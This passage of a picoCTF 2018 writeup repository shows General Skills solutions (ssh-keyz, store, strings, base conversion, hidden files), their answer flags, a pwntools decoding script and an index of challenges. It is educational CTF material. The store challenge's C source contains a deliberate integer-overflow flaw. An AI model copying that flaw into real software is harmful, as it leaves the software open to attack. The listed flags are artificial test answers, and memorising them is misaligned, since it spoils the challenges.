    "content": "# ssh-keyz\nPoints: 150\n\n## Category\nGeneral Skills\n\n## Question\n>As nice as it is to use our webshell, sometimes its helpful to connect directly to our machine. To do so, please add your own public key to ~/.ssh/authorized_keys, using the webshell. The flag is in the ssh banner which will be displayed when you login remotely with ssh to with your username.\n\n### Hint\n>key generation [tutorial](https://confluence.atlassian.com/bitbucketserver/creating-ssh-keys-776639788.html)\n>\n>We also have an expert demonstrator to help you along. [link](https://www.youtube.com/watch?v=3CN65ccfllU&list=PLJ_vkrXdcgH-lYlRV8O-kef2zWvoy79yP&index=4)\n\n## Solution\nAdd your public key to _~/.ssh/authorized_keys_. You can generate an RSA key by doing `ssh-keygen -t rsa`.\n\nPublic key by default stored at _~/.ssh/id_rsa.pub_.\n\nConnect to web shell by doing `ssh <username>@2018shell1.picoctf.com`\n\n```\n$ ssh Platy@2018shell1.picoctf.com\nThe authenticity of host '2018shell1.picoctf.com (18.223.208.176)' can't be established.\nECDSA key fingerprint is SHA256:zCX5ip3tx1RMbsJBc70jEazd+gAFzlbC1Q2iDI8LA/k.\nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added '2018shell1.picoctf.com,18.223.208.176' (ECDSA) to the list of known hosts.\npicoCTF{who_n33ds_p4ssw0rds_38dj21}\n...\n...\n...\n```\n\n### Flag\n`picoCTF{who_n33ds_p4ssw0rds_38dj21}`\n"
  },
  {
    "path": "General Skills/store/README.md",
    "content": "# store\nPoints: 400\n\n## Category\nGeneral Skills\n\n## Question\n>We started a little [store](files/store), can you buy the flag? [Source](files/source.c). Connect with `2018shell1.picoctf.com 53220`. \n\n### Hint\n>Two's compliment can do some weird things when numbers get really big!\n\n## Solution\nBased off the hint, we can assume it's probably an integer overflow. HOWEVER, just by doing _strings_\n\n```\n$ strings store | grep pico\nYOUR FLAG IS: picoCTF{numb3r3_4r3nt_s4f3_cbb7151f}\n```\n\nDon't store the flag in the local binary next time.\n\n### Flag\n`picoCTF{numb3r3_4r3nt_s4f3_cbb7151f}`\n"
  },
  {
    "path": "General Skills/store/files/source.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\nint main()\n{\n    int con;\n    con = 0;\n    int account_balance = 1100;\n    while(con == 0){\n        \n        printf(\"Welcome to the Store App V1.0\\n\");\n        printf(\"World's Most Secure Purchasing App\\n\");\n\n        printf(\"\\n[1] Check Account Balance\\n\");\n        printf(\"\\n[2] Buy Stuff\\n\");\n        printf(\"\\n[3] Exit\\n\");\n        int menu;\n        printf(\"\\n Enter a menu selection\\n\");\n        fflush(stdin);\n        scanf(\"%d\", &menu);\n        if(menu == 1){\n            printf(\"\\n\\n\\n Balance: %d \\n\\n\\n\", account_balance);\n        }\n        else if(menu == 2){\n            printf(\"Current Auctions\\n\");\n            printf(\"[1] I Can't Believe its not a Flag!\\n\");\n            printf(\"[2] Real Flag\\n\");\n            int auction_choice;\n            fflush(stdin);\n            scanf(\"%d\", &auction_choice);\n            if(auction_choice == 1){\n                printf(\"Imitation Flags cost 1000 each, how many would you like?\\n\");\n                \n                int number_flags = 0;\n                fflush(stdin);\n                scanf(\"%d\", &number_flags);\n                if(number_flags > 0){\n                    int total_cost = 0;\n                    total_cost = 1000*number_flags;\n                    printf(\"\\nYour total cost is: %d\\n\", total_cost);\n                    if(total_cost <= account_balance){\n                        account_balance = account_balance - total_cost;\n                        printf(\"\\nYour new balance: %d\\n\\n\", account_balance);\n                    }\n                    else{\n                        printf(\"Not enough funds\\n\");\n                    }\n                                    \n                    \n                }\n                    \n                    \n                    \n                \n            }\n            else if(auction_choice == 2){\n                
printf(\"A genuine Flag costs 100000 dollars, and we only have 1 in stock\\n\");\n                printf(\"Enter 1 to purchase\");\n                int bid = 0;\n                fflush(stdin);\n                scanf(\"%d\", &bid);\n                \n                if(bid == 1){\n                    \n                    if(account_balance > 100000){\n                        printf(\"YOUR FLAG IS:\\n\");\n                        }\n                    \n                    else{\n                        printf(\"\\nNot enough funds for transaction\\n\\n\\n\");\n                    }}\n\n            }\n        }\n        else{\n            con = 1;\n        }\n\n    }\n    return 0;\n}\n"
  },
  {
    "path": "General Skills/strings/README.md",
    "content": "# strings\nPoints: 100\n\n## Category\nGeneral Skills\n\n## Question\n>Can you find the flag in this [file]() without actually running it? You can also find the file in /problems/strings_2_b7404a3aee308619cb2ba79677989960 on the shell server. \n\n### Hint\n>[strings](https://linux.die.net/man/1/strings)\n\n## Solution\nWe are given a file with non-printable characters.\n\nThe _strings_ command prints all human-readable characters.\n\nWe can use the _strings_ command and _grep_ the flag.\n\nDo `strings strings | grep pico` to get flag.\n\n### Flag\n`picoCTF{sTrIngS_sAVeS_Time_3f712a28}`\n"
  },
  {
    "path": "General Skills/what base is this?/README.md",
    "content": "# what base is this?\nPoints: 200\n\n## Category\nGeneral Skills\n\n## Question\n>To be successful on your mission, you must be able read data represented in different ways, such as hexadecimal or binary. Can you get the flag from this program to prove you are ready? Connect with `nc 2018shell1.picoctf.com 1225`. \n\n### Hint\n>I hear python is a good means (among many) to convert things.\n>\n>It might help to have multiple windows open\n\n## Solution\nConvert to ASCII for the respective bases. Python or online tools can be used to help convert.\n\n1. Convert from binary\n2. Convert from hex\n3. Convert from octal\n\nWorking solution [solve.py](solution/solve.py).\n\n### Flag\n`picoCTF{delusions_about_finding_values_451a9a74}`\n"
  },
  {
    "path": "General Skills/what base is this?/solution/solve.py",
    "content": "#!/usr/bin/python\n\nfrom pwn import *\nimport re\n\ns = remote('2018shell1.picoctf.com', 1225)\n\nbinary = s.recvuntil('word.')\nprint binary\n\nbinary = re.findall(r'(\\d+)', binary)\n\nans = ''\nfor i in binary:\n\tans += chr(int(i, 2))\n\nprint 'SEND> ' + ans\ns.sendline(ans)\n\nhexa = s.recvuntil('word').strip()\nprint hexa\n\nhexa = re.findall(r'([0-9a-f]+) as ', hexa)[0]\nans = hexa.decode('hex')\n\nprint 'SEND> ' + ans\ns.sendline(ans)\n\noctal = s.recvuntil('word.')[2:]\nprint octal\n\noctal = re.findall(r'[0-9]+', octal)\n\nans = ''\nfor i in octal:\n\tans += chr(int(i, 8))\n\nprint 'SEND> ' + ans\ns.sendline(ans)\n\nprint s.recvuntil('}\\n')\n\ns.close()"
  },
  {
    "path": "General Skills/you can't see me/README.md",
    "content": "# you can't see me\nPoints: 200\n\n## Category\nGeneral Skills\n\n## Question\n>'...reading transmission... Y.O.U. .C.A.N.'.T. .S.E.E. .M.E. ...transmission ended...' Maybe something lies in /problems/you-can-t-see-me_3_1a39ec6c80b3f3a18610074f68acfe69.  \n\n### Hint\n>What command can see/read files?\n>\n>What's in the manual page of ls?\n\n## Solution\nDoing `ls -la`, you can see the file with the period character as its name. As this character has special meaning when it comes to the linux file systems, when you try to _cat_ it normally, you get the error saying that the period character is a directory.\n\nTherefore you, can try using the _cat_ command by listing all files using the _*_ special character.\n\nDo `cat .*` to get the flag.\n\n### Flag\n`picoCTF{j0hn_c3na_paparapaaaaaaa_paparapaaaaaa_cf5156ef}`\n"
  },
  {
    "path": "README.md",
    "content": "# picoCTF 2018 Writeup\nThis CTF was done with [@pauxy](https://github.com/pauxy) and [@StopDuckRoll](https://github.com/StopDuckRoll)\n\nSpecial thanks to [@LFlare](https://github.com/LFlare) for helping out with a few challenges!\n\n### Forensics writeups\nAlthough it states that I may do some of the writeups for the forensics challenges, it's very unlikely it will ever be completed, mostly because those challenges were not solved by me, and I'm lazy. Pull requests are welcomed!\n\n# Content Page\n- [Binary Exploitation](#binary-exploitation)\n- [Cryptography](#cryptography)\n- [Forensics](#forensics)\n- [General Skills](#general-skills)\n- [Reversing](#reversing)\n- [Web Exploitation](#web-exploitation)\n\n## Binary Exploitation\n<table>\n    <thead>\n        <tr class=\"header\">\n            <th>Challenges</th>\n            <th>Points</th>\n            <th>Status</th>\n        </tr>\n    </thead>\n    <tbody>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/buffer%20overflow%200\">buffer overflow 0</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/buffer%20overflow%201\">buffer overflow 1</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/leak-me\">leak-me</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/shellcode\">shellcode</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/buffer%20overflow%202\">buffer overflow 2</a></td>\n            
<td markdown=\"span\">250</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/got-2-learn-libc\">got-2-learn-libc</a></td>\n            <td markdown=\"span\">250</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/echooo\">echooo</a></td>\n            <td markdown=\"span\">300</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/authenticate\">authenticate</a></td>\n            <td markdown=\"span\">350</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/got-shell%3F\">got-shell?</a></td>\n            <td markdown=\"span\">350</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/rop%20chain\">rop chain</a></td>\n            <td markdown=\"span\">350</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/buffer%20overflow%203\">buffer overflow 3</a></td>\n            <td markdown=\"span\">450</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/echo%20back\">echo back</a></td>\n            <td markdown=\"span\">500</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/are%20you%20root%3F\">are you root?</a></td>\n            <td markdown=\"span\">550</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a 
href=\"Binary%20Exploitation/gps\">gps</a></td>\n            <td markdown=\"span\">550</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Binary%20Exploitation/can-you-gets-me\">can-you-gets-me</a></td>\n            <td markdown=\"span\">650</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n    </tbody>\n</table>\n\n## Cryptography\n<table>\n    <thead>\n        <tr class=\"header\">\n            <th>Challenges</th>\n            <th>Points</th>\n            <th>Status</th>\n        </tr>\n    </thead>\n    <tbody>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/Crypto%20Warmup%201\">Crypto Warmup 1</a></td>\n            <td markdown=\"span\">75</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/Crypto%20Warmup%202\">Crypto Warmup 2</a></td>\n            <td markdown=\"span\">75</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/HEEEEEEERE%27S%20Johnny!\">HEEEEEEERE'S Johnny!</a></td>\n            <td markdown=\"span\">100</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/caesar%20cipher%201\">caesar cipher 1</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/hertz\">hertz</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/blaise%27s%20cipher\">blaise's cipher</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td 
markdown=\"span\"><a href=\"Cryptography/hertz%202\">hertz 2</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/Safe%20RSA\">Safe RSA</a></td>\n            <td markdown=\"span\">250</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/caesar%20cipher%202\">caesar cipher 2</a></td>\n            <td markdown=\"span\">250</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/rsa-madlibs\">rsa-madlibs</a></td>\n            <td markdown=\"span\">250</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/SpyFi\">SpyFi</a></td>\n            <td markdown=\"span\">300</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/Super%20Safe%20RSA\">Super Safe RSA</a></td>\n            <td markdown=\"span\">350</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/Super%20Safe%20RSA%202\">Super Safe RSA 2</a></td>\n            <td markdown=\"span\">425</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/Magic%20Padding%20Oracle\">Magic Padding Oracle</a></td>\n            <td markdown=\"span\">450</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Cryptography/Super%20Safe%20RSA%203\">Super Safe RSA 3</a></td>\n            <td markdown=\"span\">600</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a 
href=\"Cryptography/James%20Brahm%20Returns\">James Brahm Returns</a></td>\n            <td markdown=\"span\">700</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n    </tbody>\n</table>\n\n## Forensics\n<table>\n    <thead>\n        <tr class=\"header\">\n            <th>Challenges</th>\n            <th>Points</th>\n            <th>Status</th>\n        </tr>\n    </thead>\n    <tbody>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/Forensics%20Warmup%201\">Forensics Warmup 1</a></td>\n            <td markdown=\"span\">50</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/Forensics%20Warmup%202\">Forensics Warmup 2</a></td>\n            <td markdown=\"span\">50</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/Desrouleaux\">Desrouleaux</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/Reading%20Between%20the%20Eyes\">Reading Between the Eyes</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/Recovering%20From%20the%20Snap\">Recovering From the Snap</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/admin%20panel\">admin panel</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/hex%20editor\">hex editor</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n      
      <td markdown=\"span\"><a href=\"Forensics/Truly%20an%20Artist\">Truly an Artist</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/now%20you%20don%27t\">now you don't</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/Ext%20Super%20Magic\">Ext Super Magic</a></td>\n            <td markdown=\"span\">250</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/Lying%20Out\">Lying Out</a></td>\n            <td markdown=\"span\">250</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/What%27s%20My%20Name%3F\">What's My Name?</a></td>\n            <td markdown=\"span\">250</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/core\">core</a></td>\n            <td markdown=\"span\">350</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/Malware%20Shops\">Malware Shops</a></td>\n            <td markdown=\"span\">400</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Forensics/LoadSomeBits\">LoadSomeBits</a></td>\n            <td markdown=\"span\">550</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n    </tbody>\n</table>\n\n## General Skills\n<table>\n    <thead>\n        <tr class=\"header\">\n            <th>Challenges</th>\n            <th>Points</th>\n            <th>Status</th>\n        </tr>\n    </thead>\n    <tbody>\n        <tr>\n            <td markdown=\"span\"><a 
href=\"General%20Skills/General%20Warmup%201\">General Skills 1</a></td>\n            <td markdown=\"span\">50</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/General%20Warmup%202\">General Skills 2</a></td>\n            <td markdown=\"span\">50</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/General%20Warmup%203\">General Skills 3</a></td>\n            <td markdown=\"span\">50</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/Resources\">Resources</a></td>\n            <td markdown=\"span\">50</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/grep%201\">grep 1</a></td>\n            <td markdown=\"span\">75</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/net%20cat\">net cat</a></td>\n            <td markdown=\"span\">75</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/strings\">strings</a></td>\n            <td markdown=\"span\">100</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/pipe\">pipe</a></td>\n            <td markdown=\"span\">110</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/grep%202\">grep 2</a></td>\n            <td markdown=\"span\">125</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a 
href=\"General%20Skills/Aca-Shell-A\">Aca-Shell-A</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/environ\">environ</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/ssh-keyz\">ssh-keyz</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/what%20base%20is%20this%3F\">what base is this?</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/you%20can%27t%20see%20me\">you can't see me</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/absolutely%20relative\">absolutely relative</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/in%20out%20error\">in out error</a></td>\n            <td markdown=\"span\">275</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/learn%20gdb\">learn gdb</a></td>\n            <td markdown=\"span\">300</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/roulette\">roulette</a></td>\n            <td markdown=\"span\">350</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a 
href=\"General%20Skills/store\">store</a></td>\n            <td markdown=\"span\">400</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/script%20me\">script me</a></td>\n            <td markdown=\"span\">500</td>\n            <td markdown=\"span\">Solved (<a href=\"https://github.com/plusline\">@plusline</a>)</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"General%20Skills/Dog%20or%20Frog\">Dog or Frog</a></td>\n            <td markdown=\"span\">900</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n    </tbody>\n</table>\n\n## Reversing\n<table>\n    <thead>\n        <tr class=\"header\">\n            <th>Challenges</th>\n            <th>Points</th>\n            <th>Status</th>\n        </tr>\n    </thead>\n    <tbody>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/Reversing%20Warmup%201\">Reversing Warmup 1</a></td>\n            <td markdown=\"span\">50</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/Reversing%20Warmup%202\">Reversing Warmup 2</a></td>\n            <td markdown=\"span\">50</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/assembly-0\">assembly-0</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/assembly-1\">assembly-1</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/be-quick-or-be-dead-1\">be-quick-or-be-dead-1</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            
<td markdown=\"span\"><a href=\"Reversing/quackme\">quackme</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/assembly-2\">assembly-2</a></td>\n            <td markdown=\"span\">250</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/be-quick-or-be-dead-2\">be-quick-or-be-dead-2</a></td>\n            <td markdown=\"span\">275</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/be-quick-or-be-dead-3\">be-quick-or-be-dead-3</a></td>\n            <td markdown=\"span\">350</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/quackme%20up\">quackme up</a></td>\n            <td markdown=\"span\">350</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/Radix%27s%20Terminal\">Radix's Terminal</a></td>\n            <td markdown=\"span\">400</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/assembly-3\">assembly-3</a></td>\n            <td markdown=\"span\">400</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/keygen-me-1\">keygen-me-1</a></td>\n            <td markdown=\"span\">400</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Reversing/assembly-4\">assembly-4</a></td>\n            <td markdown=\"span\">550</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a 
href=\"Reversing/special-pw\">special-pw</a></td>\n            <td markdown=\"span\">600</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n    </tbody>\n</table>\n\n## Web Exploitation\n<table>\n    <thead>\n        <tr class=\"header\">\n            <th>Challenges</th>\n            <th>Points</th>\n            <th>Status</th>\n        </tr>\n    </thead>\n    <tbody>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation%2FInspect%20Me\">Inspect Me</a></td>\n            <td markdown=\"span\">125</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/Client%20Side%20is%20Still%20Bad\">Client Side is Still Bad</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/Logon\">Logon</a></td>\n            <td markdown=\"span\">150</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/Irish%20Name%20Repo\">Irish Name Repo</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/Mr.%20Robots\">Mr. 
Robots</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/No%20Login\">No Login</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/Secret%20Agent\">Secret Agent</a></td>\n            <td markdown=\"span\">200</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/Buttons\">Buttons</a></td>\n            <td markdown=\"span\">250</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/The%20Vault\">The Vault</a></td>\n            <td markdown=\"span\">250</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/Artisinal%20Handcrafted%20HTTP%203\">Artisinal Handcrafted HTTP 3</a></td>\n            <td markdown=\"span\">300</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/Flaskcards\">Flaskcards</a></td>\n            <td markdown=\"span\">350</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/fancy-alive-monitoring\">fancy-alive-monitoring</a></td>\n            <td markdown=\"span\">400</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/Secure%20Logon\">Secure Logon</a></td>\n            <td markdown=\"span\">500</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a 
href=\"Web%20Exploitation/Flaskcards%20Skeleton%20Key\">Flaskcards Skeleton Key</a></td>\n            <td markdown=\"span\">600</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/Help%20Me%20Reset%202\">Help Me Reset 2</a></td>\n            <td markdown=\"span\">600</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"Web%20Exploitation/A%20Simple%20Question\">A Simple Question</a></td>\n            <td markdown=\"span\">650</td>\n            <td markdown=\"span\">Solved</td>\n        </tr>\n        <tr>\n            <td markdown=\"span\"><a href=\"LambDash%203\">LambDash 3</a></td>\n            <td markdown=\"span\">800</td>\n            <td markdown=\"span\">Unsolved</td>\n        </tr>\n    </tbody>\n</table>\n"
  },
  {
    "path": "Reversing/Radix's Terminal/README.md",
